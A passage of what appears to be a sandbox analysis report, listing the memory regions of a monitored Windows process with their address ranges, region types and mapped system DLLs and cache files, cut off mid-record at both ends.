start_va = 0x610000
end_va = 0x611fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mtextra.ttf"
filename = "\\Program Files (x86)\\Common Files\\microsoft shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\equation\\mtextra.ttf")
Region:
id = 1313
start_va = 0x600000
end_va = 0x61bfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "gdipfontcachev1.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\gdipfontcachev1.dat")
Region:
id = 1314
start_va = 0x4ff0000
end_va = 0x50effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ff0000"
filename = ""
Region:
id = 1315
start_va = 0x50f0000
end_va = 0x5a1ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 1316
start_va = 0x600000
end_va = 0x600fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000600000"
filename = ""
Region:
id = 1317
start_va = 0x6d1f0000
end_va = 0x6d60bfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "windowsbase.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\WindowsBase\\1a4cc316fb6d09525321fc0be44692d8\\WindowsBase.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\windowsbase\\1a4cc316fb6d09525321fc0be44692d8\\windowsbase.ni.dll")
Region:
id = 1318
start_va = 0x6c5b0000
end_va = 0x6d1ebfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "presentationcore.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\PresentationCore\\468f4e17be144ca12a73a4297eacc9cc\\PresentationCore.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\presentationcore\\468f4e17be144ca12a73a4297eacc9cc\\presentationcore.ni.dll")
Region:
id = 1319
start_va = 0x6b1c0000
end_va = 0x6c5a2fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "presentationframework.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Presentatio5ae0f00f#\\252cc7b0fae8cfe083bdc149957c0c54\\PresentationFramework.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\presentatio5ae0f00f#\\252cc7b0fae8cfe083bdc149957c0c54\\presentationframework.ni.dll")
Region:
id = 1320
start_va = 0x970000
end_va = 0x9d1fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorrc.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll")
Region:
id = 1321
start_va = 0x610000
end_va = 0x61ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000610000"
filename = ""
Region:
id = 1322
start_va = 0x8b0000
end_va = 0x8bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008b0000"
filename = ""
Region:
id = 1323
start_va = 0x8c0000
end_va = 0x8cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 1324
start_va = 0x8d0000
end_va = 0x8dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008d0000"
filename = ""
Region:
id = 1325
start_va = 0x8c0000
end_va = 0x8cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 1326
start_va = 0x8d0000
end_va = 0x8dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008d0000"
filename = ""
Region:
id = 1327
start_va = 0x8e0000
end_va = 0x8effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008e0000"
filename = ""
Region:
id = 1328
start_va = 0x8c0000
end_va = 0x8cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 1329
start_va = 0x1230000
end_va = 0x126ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001230000"
filename = ""
Region:
id = 1330
start_va = 0x5b90000
end_va = 0x5c8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005b90000"
filename = ""
Region:
id = 1331
start_va = 0x7efa7000
end_va = 0x7efa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa7000"
filename = ""
Region:
id = 1332
start_va = 0x7d50000
end_va = 0x8d4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007d50000"
filename = ""
Region:
id = 1333
start_va = 0x5c90000
end_va = 0x5e5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005c90000"
filename = ""
Region:
id = 1334
start_va = 0x8d50000
end_va = 0x9d4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008d50000"
filename = ""
Region:
id = 1335
start_va = 0x9d50000
end_va = 0xa0dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009d50000"
filename = ""
Region:
id = 1336
start_va = 0x8c0000
end_va = 0x8cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 1337
start_va = 0x8c0000
end_va = 0x8cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 1338
start_va = 0x5050000
end_va = 0x508ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005050000"
filename = ""
Region:
id = 1339
start_va = 0x50b0000
end_va = 0x50effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000050b0000"
filename = ""
Region:
id = 1340
start_va = 0x5a50000
end_va = 0x5b4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005a50000"
filename = ""
Region:
id = 1341
start_va = 0x7efa4000
end_va = 0x7efa6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa4000"
filename = ""
Region:
id = 1342
start_va = 0x8c0000
end_va = 0x8cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 1343
start_va = 0x5e80000
end_va = 0x5ebffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005e80000"
filename = ""
Region:
id = 1344
start_va = 0xa0f0000
end_va = 0xa1effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a0f0000"
filename = ""
Region:
id = 1345
start_va = 0x7efa1000
end_va = 0x7efa3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa1000"
filename = ""
Region:
id = 1346
start_va = 0x8c0000
end_va = 0x8cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 1347
start_va = 0x8c0000
end_va = 0x8c2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008c0000"
filename = ""
Region:
id = 1348
start_va = 0x8d0000
end_va = 0x8dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008d0000"
filename = ""
Region:
id = 1349
start_va = 0x8d0000
end_va = 0x8dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008d0000"
filename = ""
Region:
id = 1350
start_va = 0x8d0000
end_va = 0x8dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008d0000"
filename = ""
Region:
id = 1351
start_va = 0x12b0000
end_va = 0x132ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000012b0000"
filename = ""
Region:
id = 1352
start_va = 0xa1f0000
end_va = 0xa2effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a1f0000"
filename = ""
Region:
id = 1353
start_va = 0x6b0c0000
end_va = 0x6b1bafff
monitored = 0
entry_point = 0x6b0d17e1
region_type = mapped_file
name = "windowscodecs.dll"
filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll")
Region:
id = 1354
start_va = 0x4f30000
end_va = 0x4fb2fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004f30000"
filename = ""
Region:
id = 1355
start_va = 0x340000
end_va = 0x3c2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000340000"
filename = ""
Region:
id = 1356
start_va = 0x3d0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1357
start_va = 0x8e0000
end_va = 0x8effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008e0000"
filename = ""
Region:
id = 1358
start_va = 0x6aed0000
end_va = 0x6b0b1fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "microsoft.visualbasic.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.V9921e851#\\a891970b44db9e340c3ef3efa95b793c\\Microsoft.VisualBasic.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.v9921e851#\\a891970b44db9e340c3ef3efa95b793c\\microsoft.visualbasic.ni.dll")
Region:
id = 1359
start_va = 0x900000
end_va = 0x90ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000900000"
filename = ""
Region:
id = 1360
start_va = 0x910000
end_va = 0x91ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000910000"
filename = ""
Region:
id = 1361
start_va = 0x920000
end_va = 0x92ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000920000"
filename = ""
Region:
id = 1362
start_va = 0xa20000
end_va = 0xa2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a20000"
filename = ""
Region:
id = 1363
start_va = 0xa70000
end_va = 0xa7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a70000"
filename = ""
Region:
id = 1364
start_va = 0xa80000
end_va = 0xa8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a80000"
filename = ""
Region:
id = 1365
start_va = 0xa90000
end_va = 0xa9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a90000"
filename = ""
Region:
id = 1366
start_va = 0xae0000
end_va = 0xaeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ae0000"
filename = ""
Region:
id = 1367
start_va = 0xaf0000
end_va = 0xafffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000af0000"
filename = ""
Region:
id = 1368
start_va = 0xb00000
end_va = 0xb0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b00000"
filename = ""
Region:
id = 1369
start_va = 0xb50000
end_va = 0xb5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b50000"
filename = ""
Region:
id = 1370
start_va = 0xc60000
end_va = 0xc6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000c60000"
filename = ""
Region:
id = 1371
start_va = 0xc70000
end_va = 0xc7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000c70000"
filename = ""
Region:
id = 1372
start_va = 0xc80000
end_va = 0xc8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000c80000"
filename = ""
Region:
id = 1373
start_va = 0xc90000
end_va = 0xc9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000c90000"
filename = ""
Region:
id = 1374
start_va = 0xce0000
end_va = 0xceffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ce0000"
filename = ""
Region:
id = 1375
start_va = 0xcf0000
end_va = 0xcfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000cf0000"
filename = ""
Region:
id = 1376
start_va = 0xfc0000
end_va = 0xfcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000fc0000"
filename = ""
Region:
id = 1377
start_va = 0x1210000
end_va = 0x121ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001210000"
filename = ""
Region:
id = 1378
start_va = 0x1220000
end_va = 0x122ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001220000"
filename = ""
Region:
id = 1379
start_va = 0x1330000
end_va = 0x133ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001330000"
filename = ""
Region:
id = 1380
start_va = 0x910000
end_va = 0x91ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000910000"
filename = ""
Region:
id = 1381
start_va = 0x920000
end_va = 0x92ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000920000"
filename = ""
Region:
id = 1382
start_va = 0xa20000
end_va = 0xa2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a20000"
filename = ""
Region:
id = 1383
start_va = 0x910000
end_va = 0x91ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000910000"
filename = ""
Region:
id = 1384
start_va = 0x920000
end_va = 0x92ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000920000"
filename = ""
Region:
id = 1385
start_va = 0xa20000
end_va = 0xa2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a20000"
filename = ""
Region:
id = 1386
start_va = 0x910000
end_va = 0x91ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000910000"
filename = ""
Region:
id = 1387
start_va = 0x920000
end_va = 0x92ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000920000"
filename = ""
Region:
id = 1388
start_va = 0xa20000
end_va = 0xa2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a20000"
filename = ""
Region:
id = 1389
start_va = 0xa70000
end_va = 0xa7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a70000"
filename = ""
Region:
id = 1390
start_va = 0xa80000
end_va = 0xa8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a80000"
filename = ""
Region:
id = 1391
start_va = 0xa90000
end_va = 0xa9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a90000"
filename = ""
Region:
id = 1392
start_va = 0xae0000
end_va = 0xaeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ae0000"
filename = ""
Region:
id = 1393
start_va = 0xaf0000
end_va = 0xafffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000af0000"
filename = ""
Region:
id = 1394
start_va = 0xb00000
end_va = 0xb0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b00000"
filename = ""
Region:
id = 1395
start_va = 0xb50000
end_va = 0xb5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b50000"
filename = ""
Region:
id = 1396
start_va = 0xc60000
end_va = 0xc6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000c60000"
filename = ""
Region:
id = 1397
start_va = 0xc70000
end_va = 0xc7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000c70000"
filename = ""
Region:
id = 1398
start_va = 0xc80000
end_va = 0xc8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000c80000"
filename = ""
Region:
id = 1399
start_va = 0xc90000
end_va = 0xc9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000c90000"
filename = ""
Region:
id = 1400
start_va = 0xce0000
end_va = 0xceffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ce0000"
filename = ""
Region:
id = 1401
start_va = 0xcf0000
end_va = 0xcfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000cf0000"
filename = ""
Region:
id = 1402
start_va = 0xfc0000
end_va = 0xfcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000fc0000"
filename = ""
Region:
id = 1403
start_va = 0x1210000
end_va = 0x121ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001210000"
filename = ""
Region:
id = 1404
start_va = 0x1220000
end_va = 0x122ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001220000"
filename = ""
Region:
id = 1405
start_va = 0x1330000
end_va = 0x133ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001330000"
filename = ""
Region:
id = 1406
start_va = 0x920000
end_va = 0x92ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000920000"
filename = ""
Region:
id = 1407
start_va = 0xa20000
end_va = 0xa2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a20000"
filename = ""
Region:
id = 1408
start_va = 0xa20000
end_va = 0xa2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a20000"
filename = ""
Region:
id = 1409
start_va = 0xa70000
end_va = 0xa7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a70000"
filename = ""
Region:
id = 1410
start_va = 0xa20000
end_va = 0xa2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a20000"
filename = ""
Region:
id = 1411
start_va = 0x748a0000
end_va = 0x748c0fff
monitored = 0
entry_point = 0x748a145e
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll")
Region:
id = 1412
start_va = 0x75b90000
end_va = 0x75bd4fff
monitored = 0
entry_point = 0x75b911e1
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll")
Region:
id = 1413
start_va = 0xa70000
end_va = 0xa7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a70000"
filename = ""
Region:
id = 1414
start_va = 0xa70000
end_va = 0xa7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a70000"
filename = ""
Region:
id = 1415
start_va = 0x6ada0000
end_va = 0x6aecffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.management.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\e114780fd3ea5727401c06ea4f22ef35\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.management\\e114780fd3ea5727401c06ea4f22ef35\\system.management.ni.dll")
Region:
id = 1416
start_va = 0xa3c0000
end_va = 0xa3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a3c0000"
filename = ""
Region:
id = 1417
start_va = 0xa4b0000
end_va = 0xa5affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a4b0000"
filename = ""
Region:
id = 1418
start_va = 0x72aa0000
end_va = 0x72b94fff
monitored = 0
entry_point = 0x72ab0d9e
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll")
Region:
id = 1419
start_va = 0x7ef9e000
end_va = 0x7efa0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef9e000"
filename = ""
Region:
id = 1420
start_va = 0xa70000
end_va = 0xa71fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a70000"
filename = ""
Region:
id = 1421
start_va = 0x73a90000
end_va = 0x73c2dfff
monitored = 0
entry_point = 0x73abe6b5
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 1422
start_va = 0xa80000
end_va = 0xa80fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 1423
start_va = 0xa90000
end_va = 0xa91fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a90000"
filename = ""
Region:
id = 1424
start_va = 0x73820000
end_va = 0x7386bfff
monitored = 0
entry_point = 0x73822c14
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")
Region:
id = 1425
start_va = 0xa80000
end_va = 0xa80fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a80000"
filename = ""
Region:
id = 1426
start_va = 0x754c0000
end_va = 0x75542fff
monitored = 0
entry_point = 0x754c23d2
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")
Region:
id = 1427
start_va = 0xae0000
end_va = 0xae0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ae0000"
filename = ""
Region:
id = 1428
start_va = 0x73c30000
end_va = 0x746affff
monitored = 0
entry_point = 0x73c36b95
region_type = mapped_file
name = "ieframe.dll"
filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll")
Region:
id = 1429
start_va = 0x75950000
end_va = 0x75954fff
monitored = 0
entry_point = 0x75951438
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")
Region:
id = 1430
start_va = 0x748e0000
end_va = 0x7491bfff
monitored = 0
entry_point = 0x748e3089
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll")
Region:
id = 1431
start_va = 0x74f30000
end_va = 0x7512afff
monitored = 0
entry_point = 0x74f322d9
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll")
Region:
id = 1432
start_va = 0xaf0000
end_va = 0xaf0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll")
Region:
id = 1433
start_va = 0xa5b0000
end_va = 0xa6affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a5b0000"
filename = ""
Region:
id = 1434
start_va = 0xb00000
end_va = 0xb01fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000b00000"
filename = ""
Region:
id = 1435
start_va = 0x74de0000
end_va = 0x74f15fff
monitored = 0
entry_point = 0x74de1b35
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll")
Region:
id = 1436
start_va = 0x755b0000
end_va = 0x756a4fff
monitored = 0
entry_point = 0x755b1865
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll")
Region:
id = 1437
start_va = 0x74ab0000
end_va = 0x74bd0fff
monitored = 0
entry_point = 0x74ab158e
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll")
Region:
id = 1438
start_va = 0x76ed0000
end_va = 0x76edbfff
monitored = 0
entry_point = 0x76ed238e
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll")
Region:
id = 1439
start_va = 0x759d0000
end_va = 0x75b6cfff
monitored = 0
entry_point = 0x759d17e7
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll")
Region:
id = 1440
start_va = 0x758a0000
end_va = 0x758c6fff
monitored = 0
entry_point = 0x758a58b9
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")
Region:
id = 1441
start_va = 0x75b70000
end_va = 0x75b81fff
monitored = 0
entry_point = 0x75b71441
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll")
Region:
id = 1442
start_va = 0xb50000
end_va = 0xb5cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\setupapi.dll.mui")
Region:
id = 1443
start_va = 0xc60000
end_va = 0xc63fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.1.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db")
Region:
id = 1444
start_va = 0xc70000
end_va = 0xc95fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db")
Region:
id = 1445
start_va = 0xce0000
end_va = 0xce0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ce0000"
filename = ""
Region:
id = 1446
start_va = 0xa6b0000
end_va = 0xa7b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a6b0000"
filename = ""
Region:
id = 1447
start_va = 0xa6b0000
end_va = 0xa7b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a6b0000"
filename = ""
Region:
id = 1448
start_va = 0xa6b0000
end_va = 0xa7b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a6b0000"
filename = ""
Region:
id = 1449
start_va = 0xc60000
end_va = 0xc63fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1450
start_va = 0x1330000
end_va = 0x135ffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000015.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db")
Region:
id = 1451
start_va = 0xcf0000
end_va = 0xcf3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1452
start_va = 0x5ec0000
end_va = 0x5f25fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 1453
start_va = 0xfc0000
end_va = 0xfcdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "propsys.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui")
Region:
id = 1454
start_va = 0x1210000
end_va = 0x1210fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001210000"
filename = ""
Region:
id = 1488
start_va = 0x1220000
end_va = 0x1220fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001220000"
filename = ""
Region:
id = 1532
start_va = 0x747a0000
end_va = 0x747adfff
monitored = 0
entry_point = 0x747a1235
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll")
Region:
id = 1630
start_va = 0x1360000
end_va = 0x136ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001360000"
filename = ""
Region:
id = 1631
start_va = 0xa310000
end_va = 0xa34ffff
monitored = 1
